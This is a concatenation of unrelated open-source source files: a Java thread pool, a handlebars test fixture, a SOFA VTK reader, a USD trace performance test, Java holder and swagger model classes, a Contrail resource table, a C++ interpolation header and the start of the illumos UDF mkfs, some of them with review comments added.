    public static Future<Object> execute(IAsynchronousHandler command) {
        ThreadPoolAdaptor handler = new ThreadPoolAdaptor(command, EXECUTETIME);
        Future<Object> future = execute.submit(handler);
        return future;
    }

    /**
     * Shuts down the shared pool.
     *
     * @return true if a pool existed and shutdown was requested
     */
    @SuppressWarnings("unused")
    private static boolean shutDown() {
        if (execute != null) {
            execute.shutdown();
            return true;
        }
        return false;
    }

    /**
     * Builds a new extended thread pool from the given parameters.
     *
     * @param vo pool sizing, queue capacity, thread-name prefix and discard policy
     * @return a configured {@link ThreadPoolExecutorExtend} wired to its queue
     */
    public static ThreadPoolExecutorExtend getThreadPool(ThreadPoolParameterVO vo) {
        int corePoolSize = vo.getCorePoolSize();
        int maximumPoolSize = vo.getMaximumPoolSize();
        int initialCapacity = vo.getInitialCapacity();
        long keepAliveTime = vo.getKeepAliveTime();
        String threadName = vo.getThreadName();
        // Queue is built with an explicit capacity and the discard policy.
        TaskQueue taskqueue = new TaskQueue(initialCapacity, vo.isDiscard());
        ThreadPoolExecutorExtend executeNew = new ThreadPoolExecutorExtend(corePoolSize, maximumPoolSize,
                keepAliveTime, TimeUnit.SECONDS,
                taskqueue, new TaskThreadFactory(threadName), new ThreadPlloRejectedExecutionHandler(vo.isDiscard()));
        // The queue needs a back-reference to the pool to implement its offer() policy.
        taskqueue.setParent(executeNew);
        // startThreadMonitor();
        return executeNew;
    }

    /** Builds the shared pool from threadPoolConfig.properties (with defaults). */
    private static ExecutorService init() {
        Properties ps = getThreadPoolConfig();
        if (ps == null) {
            throw new NullPointerException("找不到 threadpool 配置文件!");
        }
        int corePoolSize = Integer.parseInt(ps.getProperty("corePoolSize", "5"));
        int maximumPoolSize = Integer.parseInt(ps.getProperty("maximumPoolSize", "120"));
        int initialCapacity = Integer.parseInt(ps.getProperty("initialCapacity", "20000"));
        long keepAliveTime = Long.parseLong(ps.getProperty("keepAliveTime", "120"));
        String threadName = ps.getProperty("threadName", "base-framework-threadPool-");
        ThreadPoolParameterVO vo = new ThreadPoolParameterVO();
        vo.setCorePoolSize(corePoolSize);
        vo.setMaximumPoolSize(maximumPoolSize);
        vo.setInitialCapacity(initialCapacity);
        vo.setKeepAliveTime(keepAliveTime);
        vo.setMaximumPoolSize(maximumPoolSize); // NOTE(review): duplicate call — maximumPoolSize already set above
        vo.setThreadName(threadName);
        vo.setDiscard(false);
        return getThreadPool(vo);
    }

    /** Loads /threadPoolConfig.properties from the classpath; null if absent. */
    private static Properties getThreadPoolConfig() {
        Properties ps = new Properties();
        InputStream in = CommonThreadPool.class.getResourceAsStream("/threadPoolConfig.properties");
        if (in == null) {
            return null;
        }
        try {
            ps.load(in);
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
        return ps;
    }

    /**
     * Whether used heap has crossed the threshold (70% of max heap).
     *
     * @return true if used heap exceeds the threshold
     */
    public static boolean isMemoryThreshold() {
        long size = ManagementFactory.getMemoryMXBean().getHeapMemoryUsage().getUsed();
        long thresholdSize = (long) (ManagementFactory.getMemoryMXBean().getHeapMemoryUsage().getMax() * 0.7);
        if (size > thresholdSize) {
            return true;
        }
        return false;
    }

    /** Thread factory producing daemon threads named with a common prefix. */
    static class TaskThreadFactory implements ThreadFactory {
        final ThreadGroup group;
        final AtomicInteger threadNumber = new AtomicInteger(1);
        final String namePrefix;

        TaskThreadFactory(String namePrefix) {
            SecurityManager s = System.getSecurityManager();
            group = (s != null) ? s.getThreadGroup() : Thread.currentThread().getThreadGroup();
            this.namePrefix = namePrefix;
        }

        public Thread newThread(Runnable r) {
            Thread t = new Thread(group, r, namePrefix + threadNumber.getAndIncrement());
            t.setDaemon(true);
            if (t.getPriority() != Thread.NORM_PRIORITY) {
                t.setPriority(Thread.NORM_PRIORITY);
            }
            return t;
        }
    }

    /**
     * Work queue that prefers growing the pool (up to its maximum) over
     * queueing, and can shed work when the heap threshold is exceeded.
     */
    static class TaskQueue extends LinkedBlockingQueue<Runnable> {

        private static final long serialVersionUID = -3966913824895982184L;

        // Back-reference to the owning pool; set via setParent() after construction.
        ThreadPoolExecutorExtend parent = null;
        // When true, offer() sheds load once the heap threshold is crossed.
        boolean isDiscard = true;

        public TaskQueue() {
            super();
        }

        public TaskQueue(int initialCapacity) {
            super(initialCapacity);
        }

        public TaskQueue(int initialCapacity, boolean isDiscard) {
            super(initialCapacity);
            this.isDiscard = isDiscard;
        }

        public TaskQueue(Collection<? extends Runnable> c) {
            super(c);
        }

        public void setParent(ThreadPoolExecutorExtend tp) {
            parent = tp;
        }

        public boolean force(Runnable o) {
            if (parent.isShutdown()) {
                throw new RejectedExecutionException("Executor not running, can't force a command into the queue");
            }
            return super.offer(o); // forces the item onto the queue, to be used if the task is rejected
        }

        public boolean offer(Runnable o) {
            // we can't do any checks
            if (parent == null) {
                return super.offer(o);
            }
            // Shed load: decline when discarding is enabled and heap is above threshold.
            if (this.isDiscard && isMemoryThreshold()) {
                return false;
            }
            // we are maxed out on threads, simply queue the object
            if (parent.getPoolSize() == parent.getMaximumPoolSize()) {
                return super.offer(o);
            }
            // we have idle threads, just add it to the queue
            // note that we don't use getActiveCount(), see BZ 49730
            AtomicInteger submittedTasksCountNew = parent.submittedTasksCount;
            if (submittedTasksCountNew != null && submittedTasksCountNew.get() <= parent.getPoolSize()) {
                return super.offer(o);
            }
            // if we have less threads than maximum force creation of a new thread
            // (returning false makes ThreadPoolExecutor spawn one)
            if (parent.getPoolSize() < parent.getMaximumPoolSize()) {
                return false;
            }
            // if we reached here, we need to add it to the queue
            return super.offer(o);
        }

        /**
         * Bypasses the custom offer() policy and enqueues directly.
         *
         * @param o task to enqueue
         * @return true if enqueued
         * @throws InterruptedException declared for caller compatibility; not thrown here
         */
        public boolean superOffer(Runnable o) throws InterruptedException {
            return super.offer(o);
        }
    }

    /**
     * Rejection handler: first retries a direct enqueue (covers the race where
     * offer() declined in order to grow the pool), then logs and rejects.
     */
    static class ThreadPlloRejectedExecutionHandler implements RejectedExecutionHandler {

        boolean isDiscard = true;

        public ThreadPlloRejectedExecutionHandler() {}

        public ThreadPlloRejectedExecutionHandler(boolean isDiscard) {
            this.isDiscard = isDiscard;
        }

        @SuppressWarnings("rawtypes")
        @Override
        public void rejectedExecution(Runnable r, ThreadPoolExecutor executor) {
            // If not shedding load (or heap threshold not crossed), the rejection
            // may just be a concurrency race in offer(); try to enqueue directly.
            if (!this.isDiscard || (this.isDiscard && !isMemoryThreshold())) {
                try {
                    boolean reAdd = false;
                    BlockingQueue q = executor.getQueue();
                    if (q instanceof TaskQueue) {
                        // Use the policy-free path so we don't get declined again.
                        reAdd = ((TaskQueue) q).superOffer(r);
                    } else {
                        reAdd = executor.getQueue().offer(r);
                    }
                    // boolean reAdd = executor.getQueue().offer(r, 3, TimeUnit.MILLISECONDS);
                    if (reAdd) {
                        return;
                    }
                } catch (InterruptedException e) {
                    e.printStackTrace();
                } catch (Throwable e) {
                    throw new RejectedExecutionException(e);
                }
            }
            if (r instanceof CommonFutureTask) {
                IAsynchronousHandler handlerAdaptor = ((CommonFutureTask) r).getR();
                if (handlerAdaptor == null) {
                    System.out.println("CommonThreadPool 以达到队列容量上限:" + r.toString());
                    // lhb to 2015.3.11
                    throw new RejectedExecutionException();
                }
            }
            try {
                if (r instanceof CommonFutureTask) {
                    IAsynchronousHandler handlerAdaptor = ((CommonFutureTask) r).getR();
                    // Unwrap the adaptor to log the real handler where possible.
                    IAsynchronousHandler handler = null;
                    if (handlerAdaptor instanceof ThreadPoolAdaptor) {
                        handler = ((ThreadPoolAdaptor) handlerAdaptor).getHandler();
                        if (handler == null) {
                            handler = handlerAdaptor;
                        }
                    } else {
                        handler = handlerAdaptor;
                    }
                    StringBuilder sb = new StringBuilder();
                    sb.append("任务名称:").append(handler.getClass());
                    sb.append("。happenTime=").append(formateDate());
                    sb.append("。toString=").append(handler.toString());
                    System.out.println("CommonThreadPool 以达到队列容量上限:" + sb.toString());
                } else {
                    StringBuilder sb = new StringBuilder();
                    sb.append("任务名称:").append(r.getClass());
                    sb.append("。happenTime=").append(formateDate());
                    sb.append("。toString=").append(r.toString());
                    System.out.println("CommonThreadPool 以达到队列容量上限:" + sb.toString());
                }
                // Keep the submitted-task counter in sync for the extended pool.
                if (executor instanceof ThreadPoolExecutorExtend) {
                    ((ThreadPoolExecutorExtend) executor).getSubmittedTasksCount().decrementAndGet();
                }
            } catch (Throwable e) {
                e.printStackTrace();
                throw new RejectedExecutionException(e);
            }
            // lhb to 2015.3.11
            throw new RejectedExecutionException();
        }

        /** Formats the current time using {@link #LONG_FORMAT}. */
        private String formateDate() {
            Date date = new Date();
            SimpleDateFormat sdf = new SimpleDateFormat(LONG_FORMAT);
            String result = sdf.format(date);
            return result;
        }
    }
}
|
robindiddams/handlebars.js
|
spec/expected/empty.amd.simple.js
|
{"compiler":[8,">= 4.3.0"],"main":function(container,depth0,helpers,partials,data) {
return "";
},"useData":true}
|
sofa-framework/issofa
|
SofaKernel/modules/SofaLoader/BaseVTKReader.inl
|
/******************************************************************************
* SOFA, Simulation Open-Framework Architecture, development version *
* (c) 2006-2017 INRIA, USTL, UJF, CNRS, MGH *
* *
* This program is free software; you can redistribute it and/or modify it *
* under the terms of the GNU Lesser General Public License as published by *
* the Free Software Foundation; either version 2.1 of the License, or (at *
* your option) any later version. *
* *
* This program is distributed in the hope that it will be useful, but WITHOUT *
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or *
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License *
* for more details. *
* *
* You should have received a copy of the GNU Lesser General Public License *
* along with this program. If not, see <http://www.gnu.org/licenses/>. *
*******************************************************************************
* Authors: The SOFA Team and external contributors (see Authors.txt) *
* *
* Contact information: <EMAIL> *
******************************************************************************/
#ifndef SOFA_COMPONENT_LOADER_BASEVTKREADER_INL
#define SOFA_COMPONENT_LOADER_BASEVTKREADER_INL
#include <SofaLoader/BaseVTKReader.h>
#include <string>
#include <istream>
#include <fstream>
namespace sofa
{
namespace component
{
namespace loader
{
namespace basevtkreader
{
using std::istringstream ;
using sofa::defaulttype::Vec ;
template<class T>
const void* BaseVTKReader::VTKDataIO<T>::getData()
{
return data;
}
template<class T>
void BaseVTKReader::VTKDataIO<T>::resize(int n)
{
if (dataSize != n)
{
if (data) delete[] data;
data = new T[n];
}
dataSize = n;
}
// Byte-swaps a single value t (endianness conversion). When T is a packed
// composite (nestedDataSize > 1), each nested element of size
// sizeof(T)/nestedDataSize is intended to be swapped independently.
template<class T>
T BaseVTKReader::VTKDataIO<T>::swapT(T t, int nestedDataSize)
{
    T revT;
    char* revB = (char*) &revT;
    const char* tmpB = (char*) &t;
    if (nestedDataSize < 2)
    {
        // Simple case: reverse all bytes of the value.
        for (unsigned int c=0; c<sizeof(T); ++c)
            revB[c] = tmpB[sizeof(T)-1-c];
    }
    else
    {
        int singleSize = sizeof(T)/nestedDataSize;
        for (int i=0; i<nestedDataSize; ++i)
        {
            // NOTE(review): the inner loop ranges over all sizeof(T) bytes for
            // every nested element, so for i > 0 the indices appear to run past
            // the value's storage — verify the intended per-element bound
            // (likely singleSize rather than sizeof(T)).
            for (unsigned int c=0; c<sizeof(T); ++c)
                revB[c+i*singleSize] = tmpB[(sizeof(T)-1-c) + i*singleSize];
        }
    }
    return revT;
}

// Byte-swaps every element of the buffer in place.
template<class T>
void BaseVTKReader::VTKDataIO<T>::swap()
{
    for (int i=0; i<dataSize; ++i)
        data[i] = swapT(data[i], nestedDataSize);
}
// Parses n values of type T from the string s; delegates to the stream
// overload. binary selects ASCII (0) vs raw binary (1/2) decoding.
template<class T>
bool BaseVTKReader::VTKDataIO<T>::read(const string& s, int n, int binary)
{
    istringstream iss(s);
    return read(iss, n, binary);
}
// Reads values from a whole string, deducing the element count itself:
// ASCII input counts space-separated tokens; binary input derives the
// count from the string's byte length.
template<class T>
bool BaseVTKReader::VTKDataIO<T>::read(const string& s, int binary)
{
    int n = 0;
    // compute size itself
    if (binary == 0)
    {
        // ASCII: number of tokens = number of separating spaces + 1.
        string::size_type begin = 0;
        string::size_type end = s.find(' ', begin);
        n = 1;
        while (end != string::npos)
        {
            n++;
            begin = end + 1;
            end = s.find(' ', begin);
        }
    }
    else
    {
        // Binary: element count is payload size divided by sizeof(T).
        // Fixed: the previous sizeof(s.c_str())/sizeof(T) measured the size
        // of a pointer, not of the string's buffer.
        n = (int)(s.size() / sizeof(T));
    }
    istringstream iss(s);
    return read(iss, n, binary);
}
// Reads n values from the stream. binary: 0 = ASCII, 1 = raw binary,
// 2 = raw binary with byte-swapping. On truncated or unparsable input the
// buffer is cleared and false is returned.
template<class T>
bool BaseVTKReader::VTKDataIO<T>::read(istream& in, int n, int binary)
{
    resize(n);
    if (binary)
    {
        in.read((char*)data, n *sizeof(T));
        if (in.eof() || in.bad())
        {
            resize(0);
            return false;
        }
        if (binary == 2) // swap bytes
        {
            for (int i=0; i<n; ++i)
            {
                data[i] = swapT(data[i], nestedDataSize);
            }
        }
    }
    else
    {
        // ASCII: consume whitespace-separated values line by line until
        // n values have been parsed or the stream is exhausted.
        int i = 0;
        string line;
        while(i < dataSize && !in.eof() && !in.bad())
        {
            std::getline(in, line);
            istringstream ln(line);
            while (i < n && ln >> data[i])
                ++i;
        }
        if (i < n)
        {
            resize(0);
            return false;
        }
    }
    return true;
}
// Writes n values to the stream. Binary mode dumps raw bytes; ASCII mode
// writes 'groups' space-separated values per line (groups <= 0 or > n
// means one single line). Returns false on insufficient data or stream error.
template<class T>
bool BaseVTKReader::VTKDataIO<T>::write(ofstream& out, int n, int groups, int binary)
{
    if (n > dataSize && !data) return false;
    if (binary)
    {
        out.write((char*)data, n * sizeof(T));
    }
    else
    {
        if (groups <= 0 || groups > n) groups = n;
        for (int i = 0; i < n; ++i)
        {
            // Space before every value except the first of a line.
            if ((i % groups) > 0)
                out << ' ';
            out << data[i];
            // Newline after the last value of each group.
            if ((i % groups) == groups-1)
                out << '\n';
        }
    }
    if (out.bad())
        return false;
    return true;
}
// Copies the parsed buffer into a newly allocated sofa Data<vector<T>>.
// The caller takes ownership of the returned object.
template<class T>
BaseData* BaseVTKReader::VTKDataIO<T>::createSofaData()
{
    Data<helper::vector<T> >* sdata = new Data<helper::vector<T> >(name.c_str(), true, false);
    sdata->setName(name);
    helper::vector<T>& sofaData = *sdata->beginEdit();
    for (int i=0 ; i<dataSize ; i++)
        sofaData.push_back(data[i]);
    sdata->endEdit();
    return sdata;
}
} // basevtkreader
} // namespace loader
} // namespace component
} // namespace sofa
#endif
|
DougRogers-DigitalFish/USD
|
pxr/base/trace/testenv/testTraceReportPerf.cpp
|
//
// Copyright 2018 Pixar
//
// Licensed under the Apache License, Version 2.0 (the "Apache License")
// with the following modification; you may not use this file except in
// compliance with the Apache License and the following modification to it:
// Section 6. Trademarks. is deleted and replaced with:
//
// 6. Trademarks. This License does not grant permission to use the trade
// names, trademarks, service marks, or product names of the Licensor
// and its affiliates, except as required to comply with Section 4(c) of
// the License and to reproduce the content of the NOTICE file.
//
// You may obtain a copy of the Apache License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the Apache License with the above modification is
// distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
// KIND, either express or implied. See the Apache License for the specific
// language governing permissions and limitations under the Apache License.
//
#include "pxr/base/trace/trace.h"
#include "pxr/base/trace/eventTree.h"
#include "pxr/base/trace/reporter.h"
#include "pxr/base/trace/reporterDataSourceCollector.h"
#include "pxr/base/trace/reporterDataSourceCollection.h"
#include "pxr/base/tf/stopwatch.h"
#include "pxr/base/tf/stringUtils.h"

#include <iostream>
#include <sstream>
PXR_NAMESPACE_USING_DIRECTIVE
// Appends one raw perf-stat record for 'name' (elapsed seconds and sample
// count) to the given file in the harness's single-line format.
void
WriteStats(FILE *file, const std::string& name, const TfStopwatch &timer)
{
    fprintf(
        file,
        "{'profile':'%s','metric':'time','value':%f,'samples':%zu}\n",
        name.c_str(),
        timer.GetSeconds(),
        timer.GetSampleCount());
}
// Creates a chain of N nested trace scopes. Intentionally recursive: each
// call's TRACE_FUNCTION() opens another nested scope, which an iterative
// version would not reproduce.
void Recursion(int N)
{
    TRACE_FUNCTION();
    if (N <= 1) {
        return;
    }
    Recursion(N-1);
}
// Captures roughly N trace scopes (as N/R chains of depth R) with
// collection enabled, and returns the resulting collection.
std::shared_ptr<TraceCollection>
CreateTrace(int N, int R)
{
    std::unique_ptr<TraceReporterDataSourceCollector> dataSrc =
        TraceReporterDataSourceCollector::New();
    TraceCollector::GetInstance().SetEnabled(true);
    TRACE_SCOPE("Test Outer");
    for (int i = 0; i < N/R; i++) {
        Recursion(R);
    }
    TraceCollector::GetInstance().SetEnabled(false);
    std::shared_ptr<TraceCollection> collection =
        dataSrc->ConsumeData()[0];
    // Clear the global reporter so earlier runs don't skew later timings.
    TraceReporter::GetGlobalReporter()->ClearTree();
    return collection;
}
int main(int argc, char* argv[])
{
FILE *statsFile = fopen("perfstats.raw", "w");
TfStopwatch watch;
std::vector<int> recrusionSizes = {1, 2, 10};
std::vector<int> testSizes = {1000000, 10000000, 100000000};
// Take any command line arguments and parse to see if a valid test size
// index was passed. If there are too many arguments or the arguments are
// invalid, they are ignored completely. By default only the first test
// size is run. Larger sizes better stress the system but heavily increase
// runtime and memory consumption.
size_t maxTestSize = 1;
if (argc == 2) {
std::stringstream convert(argv[1]);
size_t tmp;
if (convert >> tmp) {
if (tmp <= testSizes.size() && tmp > 0) {
maxTestSize = tmp;
}
}
}
for (int R : recrusionSizes) {
std::cout << "Recursion depth: " << R << std::endl;
for (size_t i = 0; i < maxTestSize; ++i) {
int size = testSizes[i];
watch.Reset();
watch.Start();
auto collection = CreateTrace(size, R);
watch.Stop();
std::cout << "Create Trace N: " << size << " time: "
<< watch.GetSeconds() << " scopes/msec: "
<< float(size)/watch.GetMilliseconds()
<< std::endl;
auto reporter = TraceReporter::New(
"Test", TraceReporterDataSourceCollection::New(collection));
watch.Reset();
watch.Start();
reporter->UpdateTraceTrees();
watch.Stop();
WriteStats( statsFile,
TfStringPrintf("trace trees R %d N %d", R, size),
watch);
std::cout << "Trace Trees N: " << size << " time: "
<< watch.GetSeconds()
<< " scopes/msec: " << float(size)/watch.GetMilliseconds()
<< std::endl;
}
}
fclose(statsFile);
return 0;
}
|
chingov/Milkomeda
|
Milkomeda/src/main/java/com/github/yizzuide/milkomeda/hydrogen/core/HydrogenHolder.java
|
<reponame>chingov/Milkomeda
package com.github.yizzuide.milkomeda.hydrogen.core;
import com.github.yizzuide.milkomeda.hydrogen.i18n.I18nMessages;
import javax.validation.Validator;
/**
 * HydrogenHolder
 *
 * Static holder exposing framework-wide singletons (the bean validator and
 * the i18n message source) to code outside the Spring context.
 *
 * @author yizzuide
 * @since 3.0.0
 * Create at 2020/03/26 20:25
 */
public class HydrogenHolder {
    /**
     * Bean validator.
     */
    private static Validator validator;
    /**
     * Internationalized messages.
     */
    private static I18nMessages i18nMessages;

    public static void setValidator(Validator validator) {
        HydrogenHolder.validator = validator;
    }

    public static Validator getValidator() {
        return validator;
    }

    public static void setI18nMessages(I18nMessages i18nMessages) {
        HydrogenHolder.i18nMessages = i18nMessages;
    }

    public static I18nMessages getI18nMessages() {
        return i18nMessages;
    }
}
|
jnpr-pranav/contrail-controller
|
src/vnsw/agent/resource_manager/resource_table.cc
|
<filename>src/vnsw/agent/resource_manager/resource_table.cc
/*
* Copyright (c) 2016 Juniper Networks, Inc. All rights reserved.
*/
#include <boost/uuid/uuid_io.hpp>
#include <cmn/agent_cmn.h>
#include <cmn/agent.h>
#include <resource_manager/resource_manager.h>
#include <resource_manager/resource_table.h>
#include <resource_manager/index_resource.h>
// A key is created against the table owning the given resource type; new
// keys start clean (dirty_ = false).
ResourceKey::ResourceKey(ResourceManager *rm, Resource::Type type) :
    rm_(rm), dirty_(false),
    resource_table_(static_cast<ResourceTable *>(rm->resource_table(type))) {
}

ResourceKey::~ResourceKey() {
}

// Ordering delegates to the concrete key's IsLess().
bool ResourceKey::operator<(const ResourceKey &rhs) const {
    return IsLess(rhs);
}

// Sentinel key marking the end of a backup stream.
ResourceBackupEndKey::ResourceBackupEndKey(ResourceManager *rm) :
    ResourceKey(rm, Resource::INVALID) {
}

ResourceBackupEndKey::~ResourceBackupEndKey() {
}

ResourceData::ResourceData(ResourceManager *rm) :
    rm_(rm) {
}

ResourceData::~ResourceData() {
}

ResourceTable::ResourceTable(ResourceManager *rm) : rm_(rm) {
}

// All keys must have been released before the table is destroyed.
ResourceTable::~ResourceTable() {
    assert(key_data_map_.size() == 0);
}

void ResourceTable::InsertKey(KeyPtr key, DataPtr data) {
    key_data_map_.insert(std::pair<KeyPtr, DataPtr>(key, data));
}

void ResourceTable::DeleteKey(KeyPtr key) {
    key_data_map_.erase(key);
}

// Returns the data for a key, or an empty pointer when absent.
ResourceTable::DataPtr ResourceTable::FindKeyPtr(KeyPtr key) {
    KeyDataMapIter it = key_data_map_.find(key);
    if (it == key_data_map_.end()) {
        return DataPtr();
    }
    return (*it).second;
}

ResourceData* ResourceTable::FindKey(KeyPtr key) {
    return (FindKeyPtr(key).get());
}
// Walk all the entries and release keys that are still marked dirty
// (i.e. never re-claimed and therefore not usable).
void ResourceTable::FlushStale() {
    for (KeyDataMapIter it = key_data_map_.begin();
         it != key_data_map_.end();) {
        KeyPtr key = it->first;
        if (key->dirty()) {
            // Advance before Release(): releasing erases the entry, which
            // would invalidate the current iterator.
            it++;
            rm_->Release(key);
        } else {
            it++;
        }
    }
}
// Allocate the resource and mark the key usable (clears the dirty flag).
ResourceTable::DataPtr ResourceTable::Allocate(KeyPtr key) {
    KeyDataMapIter it = key_data_map_.find(key);
    ResourceManager::DataPtr data = DataPtr();
    if (it == key_data_map_.end()) {
        // First use of this key: allocate backing data and index it.
        data = AllocateData(key);
        InsertKey(key, data);
        key->reset_dirty();
    } else {
        // Key already present (e.g. restored from backup): reuse its data.
        data = (*it).second;
        (*it).first->reset_dirty();
    }
    return data;
}
|
newincpp/GLnewin
|
LunaticPlatypus/Math.hh
|
<reponame>newincpp/GLnewin<filename>LunaticPlatypus/Math.hh<gh_stars>0
#pragma once
#include <cmath>
// Linear interpolation: returns the value a fraction f of the way from a
// to b (f = 0 yields a, f = 1 yields b).
template<typename T>
T lerp(T a, T b, float f) {
    const T delta = b - a;
    return a + f * delta;
}
// Cosine interpolation between y1 and y2 for mu in [0, 1]; eases in and
// out compared to plain lerp.
// Fixed: the original called an undefined 'learp' and an undefined 'PI'
// and could not compile. The interpolation is now computed inline.
template<typename T>
T CosineInterpolate(T y1, T y2, float mu) {
    const float kPi = 3.14159265358979323846f;
    const float t = (1.0f - std::cos(mu * kPi)) / 2.0f;
    return y1 + t * (y2 - y1);
}
//template<typename T>
//double CubicInterpolate(
// double y0,double y1,
// double y2,double y3,
// double mu)
//{
// double a0,a1,a2,a3,mu2;
//
// mu2 = mu*mu;
// a0 = y3 - y2 - y0 + y1;
// a1 = y0 - y1 - a0;
// a2 = y2 - y0;
// a3 = y1;
//
// return(a0*mu*mu2+a1*mu2+a2*mu+a3);
//}
|
ikechan8370/bhpan-student-group-importer
|
java-client/src/main/java/io/openDocAPI/client/model/FileGetfilecustomattributeResItem.java
|
<filename>java-client/src/main/java/io/openDocAPI/client/model/FileGetfilecustomattributeResItem.java
/*
* 6.0-OpenDoc_API-文档访问
* API to access AnyShare 如有任何疑问,可到开发者社区提问:https://developers.aishu.cn # Authentication - 调用需要鉴权的API,必须将token放在HTTP header中:\"Authorization: Bearer ACCESS_TOKEN\" - 对于GET请求,除了将token放在HTTP header中,也可以将token放在URL query string中:\"tokenid=ACCESS_TOKEN\"
*
* OpenAPI spec version: 6.0.10
*
*
* NOTE: This class is auto generated by the swagger code generator program.
* https://github.com/swagger-api/swagger-codegen.git
* Do not edit the class manually.
*/
package io.openDocAPI.client.model;
import java.util.Objects;
import java.util.Arrays;
import com.google.gson.TypeAdapter;
import com.google.gson.annotations.JsonAdapter;
import com.google.gson.annotations.SerializedName;
import com.google.gson.stream.JsonReader;
import com.google.gson.stream.JsonWriter;
import io.swagger.v3.oas.annotations.media.Schema;
import java.io.IOException;
import java.util.ArrayList;
import java.util.List;
/**
* FileGetfilecustomattributeResItem
*/
@javax.annotation.Generated(value = "io.swagger.codegen.v3.generators.java.JavaClientCodegen", date = "2020-06-28T09:01:49.177Z[Etc/UTC]")
public class FileGetfilecustomattributeResItem {
@SerializedName("id")
private Long id = null;
@SerializedName("name")
private String name = null;
@SerializedName("value")
private Object value = null;
@SerializedName("valueid")
private List<Integer> valueid = null;
@SerializedName("type")
private Long type = null;
public FileGetfilecustomattributeResItem id(Long id) {
this.id = id;
return this;
}
/**
* 属性唯一ID
* @return id
**/
@Schema(required = true, description = "属性唯一ID")
public Long getId() {
return id;
}
public void setId(Long id) {
this.id = id;
}
public FileGetfilecustomattributeResItem name(String name) {
this.name = name;
return this;
}
/**
* 属性名称
* @return name
**/
@Schema(required = true, description = "属性名称")
public String getName() {
return name;
}
public void setName(String name) {
this.name = name;
}
public FileGetfilecustomattributeResItem value(Object value) {
this.value = value;
return this;
}
/**
* 属性值,类型为:string/int/string array type等于1、3时value类型为string,0为string array, 其余均为int 属性值为空时不存在此字段
* @return value
**/
@Schema(description = "属性值,类型为:string/int/string array type等于1、3时value类型为string,0为string array, 其余均为int 属性值为空时不存在此字段 ")
public Object getValue() {
return value;
}
public void setValue(Object value) {
this.value = value;
}
public FileGetfilecustomattributeResItem valueid(List<Integer> valueid) {
this.valueid = valueid;
return this;
}
public FileGetfilecustomattributeResItem addValueidItem(Integer valueidItem) {
if (this.valueid == null) {
this.valueid = new ArrayList<Integer>();
}
this.valueid.add(valueidItem);
return this;
}
/**
* 属性值ID,类型为int/int array type等于0或1时存在。0时是int array
* @return valueid
**/
@Schema(description = "属性值ID,类型为int/int array type等于0或1时存在。0时是int array ")
public List<Integer> getValueid() {
return valueid;
}
public void setValueid(List<Integer> valueid) {
this.valueid = valueid;
}
public FileGetfilecustomattributeResItem type(Long type) {
this.type = type;
return this;
}
/**
* 属性类型 - 0:层级 - 1:枚举 - 2:数字 - 3:文本 - 4:时间 (秒)
* @return type
**/
@Schema(required = true, description = "属性类型 - 0:层级 - 1:枚举 - 2:数字 - 3:文本 - 4:时间 (秒) ")
public Long getType() {
return type;
}
public void setType(Long type) {
this.type = type;
}
@Override
public boolean equals(java.lang.Object o) {
if (this == o) {
return true;
}
if (o == null || getClass() != o.getClass()) {
return false;
}
FileGetfilecustomattributeResItem fileGetfilecustomattributeResItem = (FileGetfilecustomattributeResItem) o;
return Objects.equals(this.id, fileGetfilecustomattributeResItem.id) &&
Objects.equals(this.name, fileGetfilecustomattributeResItem.name) &&
Objects.equals(this.value, fileGetfilecustomattributeResItem.value) &&
Objects.equals(this.valueid, fileGetfilecustomattributeResItem.valueid) &&
Objects.equals(this.type, fileGetfilecustomattributeResItem.type);
}
@Override
public int hashCode() {
return Objects.hash(id, name, value, valueid, type);
}
@Override
public String toString() {
StringBuilder sb = new StringBuilder();
sb.append("class FileGetfilecustomattributeResItem {\n");
sb.append(" id: ").append(toIndentedString(id)).append("\n");
sb.append(" name: ").append(toIndentedString(name)).append("\n");
sb.append(" value: ").append(toIndentedString(value)).append("\n");
sb.append(" valueid: ").append(toIndentedString(valueid)).append("\n");
sb.append(" type: ").append(toIndentedString(type)).append("\n");
sb.append("}");
return sb.toString();
}
/**
* Convert the given object to string with each line indented by 4 spaces
* (except the first line).
*/
private String toIndentedString(java.lang.Object o) {
if (o == null) {
return "null";
}
return o.toString().replace("\n", "\n ");
}
}
|
AsahiOS/gate
|
usr/src/cmd/fs.d/udfs/mkfs/mkfs.c
|
/*
* CDDL HEADER START
*
* The contents of this file are subject to the terms of the
* Common Development and Distribution License (the "License").
* You may not use this file except in compliance with the License.
*
* You can obtain a copy of the license at usr/src/OPENSOLARIS.LICENSE
* or http://www.opensolaris.org/os/licensing.
* See the License for the specific language governing permissions
* and limitations under the License.
*
* When distributing Covered Code, include this CDDL HEADER in each
* file and include the License file at usr/src/OPENSOLARIS.LICENSE.
* If applicable, add the following below this CDDL HEADER, with the
* fields enclosed by brackets "[]" replaced with your own identifying
* information: Portions Copyright [yyyy] [name of copyright owner]
*
* CDDL HEADER END
*/
/*
* Copyright 2009 Sun Microsystems, Inc. All rights reserved.
* Use is subject to license terms.
*/
/* Copyright (c) 1983, 1984, 1985, 1986, 1987, 1988, 1989 AT&T */
/* All Rights Reserved */
/*
* Portions of this source code were derived from Berkeley 4.3 BSD
* under license from the Regents of the University of California.
*/
/*
* make file system for udfs (UDF - ISO13346)
*
* usage:
*
* mkfs [-F FSType] [-V] [-m] [options]
* [-o specific_options] special size
*
* where specific_options are:
* N - no create
* label - volume label
* psize - physical block size
*/
#include <stdio.h>
#include <strings.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <time.h>
#include <locale.h>
#include <fcntl.h>
#include <errno.h>
#include <limits.h>
#include <sys/mnttab.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/sysmacros.h>
#include <sys/vnode.h>
#include <sys/mntent.h>
#include <sys/filio.h>
#include <sys/stat.h>
#include <ustat.h>
#include <sys/isa_defs.h> /* for ENDIAN defines */
#include <sys/dkio.h>
#include <sys/fdio.h>
#include <sys/vtoc.h>
#include <sys/fs/udf_volume.h>
extern char *getfullrawname(char *);
extern char *getfullblkname(char *);
extern struct tm *localtime_r(const time_t *, struct tm *);
extern void maketag(struct tag *, struct tag *);
/* Helpers provided by the shared UDF support library. */
extern int verifytag(struct tag *, uint32_t, struct tag *, int);
extern void setcharspec(struct charspec *, int32_t, uint8_t *);
